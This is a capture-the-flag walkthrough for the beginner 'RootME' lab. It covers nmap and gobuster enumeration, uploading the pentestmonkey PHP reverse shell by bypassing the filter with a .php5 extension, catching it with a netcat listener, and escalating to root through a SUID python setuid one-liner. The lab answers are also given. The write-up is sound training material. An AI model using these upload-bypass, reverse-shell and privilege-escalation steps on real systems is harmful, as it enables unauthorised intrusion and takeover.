🟢RootME

A ctf for beginners, can you root me?

Questions

  • Scan the machine, how many ports are open?

  • What version of Apache are running?

  • What is the hidden directory?

  • user.txt?

  • Search for files with SUID permission, which file is weird?

  • root.txt?

Enumeration

Nmap

nmap -sSVC -A -O -vv

PORT   STATE SERVICE REASON         VERSION
22/tcp open  ssh     syn-ack ttl 61 OpenSSH 7.6p1 Ubuntu 4ubuntu0.3 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey: 
|   2048 4a:b9:16:08:84:c2:54:48:ba:5c:fd:3f:22:5f:22:14 (RSA)
| ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABAQC9irIQxn1jiKNjwLFTFBitstKOcP7gYt7HQsk6kyRQJjlkhHYuIaLTtt1adsWWUhAlMGl+97TsNK93DijTFrjzz4iv1Zwpt2hhSPQG0GibavCBf5GVPb6TitSskqpgGmFAcvyEFv6fLBS7jUzbG50PDgXHPNIn2WUoa2tLPSr23Di3QO9miVT3+TqdvMiphYaz0RUAD/QMLdXipATI5DydoXhtymG7Nb11sVmgZ00DPK+XJ7WB++ndNdzLW9525v4wzkr1vsfUo9rTMo6D6ZeUF8MngQQx5u4pA230IIXMXoRMaWoUgCB6GENFUhzNrUfryL02/EMt5pgfj8G7ojx5
|   256 a9:a6:86:e8:ec:96:c3:f0:03:cd:16:d5:49:73:d0:82 (ECDSA)
|_ecdsa-sha2-nistp256 AAAAE2VjZHNhLXNoYTItbmlzdHAyNTYAAAAIbmlzdHAyNTYAAABBBERAcu0+Tsp5KwMXdhMWEbPcF5JrZzhDTVERXqFstm7WA/5+6JiNmLNSPrqTuMb2ZpJvtL9MPhhCEDu6KZ7q6rI=
80/tcp open  http    syn-ack ttl 61 Apache httpd 2.4.29 ((Ubuntu))
| http-cookie-flags: 
|   /: 
|     PHPSESSID: 
|_      httponly flag not set
| http-methods: 
|_  Supported Methods: GET HEAD POST OPTIONS
|_http-title: HackIT - Home

Q: Scan the machine, how many ports are open?

A: 2

Q: What version of Apache are running?

A: 2.4.29

Q: What service is running on port 22?

A: ssh

finding Directories/files

gobuster dir -u http://10.10.63.255:80/ -w /usr/share/dirbuster/wordlists/directory-list-2.3-small.txt -t 33 -x html,php,txt

(the ip is different because I continued that writeup the other day)

Q: What is the hidden directory?

A: /panel/

checking the directory /panel/, we have

image

let's try to upload a shell

shell: https://raw.githubusercontent.com/pentestmonkey/php-reverse-shell/master/php-reverse-shell.php

curl https://raw.githubusercontent.com/pentestmonkey/php-reverse-shell/master/php-reverse-shell.php -o revs.php

remember to set a port to listening

nc -lvp PORT

image

"PHP isn't permitted"

let's try bypassing this using the ".php5" extension

mv revs.php revs.php5

image

it worked

to run click on "veja" ("see")

it worked, we have shell

to get a tty

python -c 'import pty;pty.spawn("/bin/bash")'

Ctrl+Z

stty raw -echo

fg

export TERM=xterm

image

user.txt

finding

find / -type f -name user.txt 2>/dev/null

image

getting

cat /var/www/user.txt

image

root.txt / Privilege Escalation

To look for the files with SUID permission we can use the command:

find / -type f -user root -perm -4000 2>/dev/null

Exploring python set uid capabilities

python -c "import os;os.setuid(0);os.system('/bin/bash')"

getting

Last updated